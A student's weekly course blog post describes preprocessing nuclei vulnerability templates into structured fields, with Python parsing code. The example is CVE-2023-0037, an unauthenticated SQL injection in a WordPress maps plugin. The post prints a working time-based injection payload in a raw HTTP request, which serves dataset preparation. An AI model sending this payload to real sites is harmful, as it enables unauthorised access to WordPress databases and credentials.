Development Course Week 2 WIL

jungjaelee · January 14, 2026

WIL

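  • For this second week, we had agreed that each of us would preprocess the dataset we chose in week 1.

    Since I only need to extract the web-based attack TEMPLATEs, I have to use the HTTP files,

    and there are many things inside HTTP, but because I need to collaborate with my teammates, I preprocessed the CVES code, which can be labeled by CVE, and the files in EXPOSURES and VULNERABILITIES, which are actual attacks.
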
id: CVE-2023-0037

info:
  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can execute SQL injection through AJAX actions to extract the complete WordPress database including user credentials, map configuration data, and sensitive site information.
  remediation: Fixed in 1.0.73
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0037
    cwe-id: CWE-89
    epss-score: 0.66547
    epss-percentile: 0.98471
    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: map_builder_for_google_maps
    framework: wordpress
    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "wd-google-maps")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502206b0beaf71de80bbe49bf6e989128f113a1e9f63cb7a9f98c239e80e055eeb022022100cb0133ac6853cb6610f85a431e4711ffa227e144c2d8aa31eb56a73d215abf4c:922c64590222798bb761d5b6d8e72950

I preprocessed the original code above into roughly METHOD, PAYLOAD, MATCHERS, and DESCRIPTION.

[
  {
    "cve_id": "CVE-2023-0037",
    "vuln_name": "WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection",
    "preprocessing_data": {
      "METHOD": {
        "verb": "POST",
        "path": "/",
        "headers": {
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "timeout": "15s"
      },
      "PAYLOAD": {
        "raw_string": "radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km",
        "injection_point": "radius",
        "attack_type": "Time-based SQL Injection",
        "marker": "SLEEP(7)"
      },
      "MATCHERS": {
        "logic": "AND",
        "conditions": [
          {
            "type": "dsl",
            "value": "duration>=7",
            "description": "Response time must be greater than or equal to 7 seconds"
          },
          {
            "type": "word",
            "part": "body",
            "value": "wd-google-maps",
            "description": "Response body must contain plugin footprint"
          },
          {
            "type": "word",
            "part": "header",
            "value": "text/html",
            "description": "Content-Type must be text/html"
          }
        ]
      },
      "DESCRIPTION": {
        "summary": "The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 contains an unauthenticated SQL injection vulnerability via the 'radius' parameter in AJAX actions.",
        "impact": "critical",
        "cvss_score": 9.8,
        "remediation": "Update to version 1.0.73 or higher."
      }
    }
  }
]
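
One way to derive the METHOD, PAYLOAD and MATCHERS fields mechanically from the template shown above, as an added example that is not the author's code. The function names `parse_raw_request` and `parse_dsl`, the flat condition record layout, and the rule used to pick the injection point are assumptions; the raw request and dsl expressions are pasted inline from the template as constructed input.

```python
import json
import re
from urllib.parse import parse_qsl

# Constructed input: raw request and dsl matchers copied from the template above.
RAW = """@timeout: 15s
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km
"""
DSL = ['duration>=7', 'contains(body, "wd-google-maps")',
       'contains(content_type, "text/html")']

def parse_raw_request(raw):
    """Split a nuclei raw HTTP request into METHOD and PAYLOAD fields."""
    head, _, body = raw.strip().partition("\n\n")
    lines = head.splitlines()
    # Lines starting with '@' are request annotations such as @timeout.
    notes = dict(l[1:].split(": ", 1) for l in lines if l.startswith("@"))
    lines = [l for l in lines if not l.startswith("@")]
    verb, path, _ = lines[0].split(" ", 2)
    headers = dict(l.split(": ", 1) for l in lines[1:])
    headers.pop("Host", None)  # {{Hostname}} is a placeholder, not data
    params = dict(parse_qsl(body, keep_blank_values=True))
    # Assumed heuristic: a decoded value that is not a plain token carries the injection.
    suspicious = [k for k, v in params.items() if not re.fullmatch(r"[\w.\-]*", v)]
    return {
        "METHOD": {"verb": verb, "path": path, "headers": headers,
                   "timeout": notes.get("timeout")},
        "PAYLOAD": {"raw_string": body, "params": params,
                    "injection_point": suspicious[0] if suspicious else None},
    }

def parse_dsl(expr):
    """Normalize one dsl matcher expression into a flat condition record."""
    m = re.fullmatch(r'contains\((\w+),\s*"([^"]*)"\)', expr)
    if m:
        return {"op": "contains", "part": m.group(1), "value": m.group(2)}
    m = re.fullmatch(r"(\w+)\s*(>=|<=|==|>|<)\s*(\d+)", expr)
    if m:
        return {"op": m.group(2), "part": m.group(1), "value": int(m.group(3))}
    return {"op": "raw", "value": expr}  # keep unknown expressions verbatim

if __name__ == "__main__":
    record = parse_raw_request(RAW)
    record["MATCHERS"] = {"logic": "AND", "conditions": [parse_dsl(e) for e in DSL]}
    print(json.dumps(record, indent=2))
```

Expressions that `parse_dsl` does not recognize are kept verbatim under `"op": "raw"`, so templates with more complex matchers can be reviewed by hand instead of being silently mislabeled.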

1 comment

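January 18, 2026

Great work on week 2 of the development course!! Following on from last week, you're still working through the data preprocessing. It looks like the preprocessing is going well for your dataset and the service you'll be developing. Keep it up!!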
